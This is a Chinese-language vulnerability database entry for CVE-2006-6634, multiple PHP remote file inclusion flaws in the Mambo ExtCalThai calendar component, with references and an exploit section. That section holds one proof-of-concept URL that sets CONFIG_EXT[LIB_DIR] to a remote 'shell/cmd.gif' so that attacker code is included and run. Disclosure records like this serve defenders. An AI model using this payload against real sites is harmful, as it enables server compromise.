Mambo ExtCalThai组件多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111248 漏洞类型 输入验证
发布时间 2006-10-12 更新时间 2006-12-19
CVE编号 CVE-2006-6634 CNNVD-ID CNNVD-200612-400
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28793
https://cxsecurity.com/issue/WLB-2006120109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-400
|漏洞详情
Mambo的ExtCalThai(com_extcalendar)0.9.1及更早版本组件存在多个PHP远程文件包含漏洞,远程攻击者可以通过在(1)传给admin_events.php的CONFIG_EXT[LANGUAGES_DIR]参数,(2)传给extcalendar.php的mosConfig_absolute_path参数,或者(3)传给lib/mail.inc.php的CONFIG_EXT[LIB_DIR]参数来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/20487/info
 
ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
ExtCalThai 0.9.1 and prior verions are vulnerable; other versions may also be affected.

http://www.example.com/MamboV4.6RC2/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://shell/cmd.gif?
|参考资料

来源:XF
名称:extcalthai-admin-file-include(29499)
链接:http://xforce.iss.net/xforce/xfdb/29499
来源:BID
名称:20487
链接:http://www.securityfocus.com/bid/20487
来源:BUGTRAQ
名称:20061012ExtCalThai_Component<=0.9.1RemoteFileInclusion
链接:http://archives.neohapsis.com/archives/bugtraq/2006-10/0179.html
来源:SREASON
名称:2041
链接:http://securityreason.com/securityalert/2041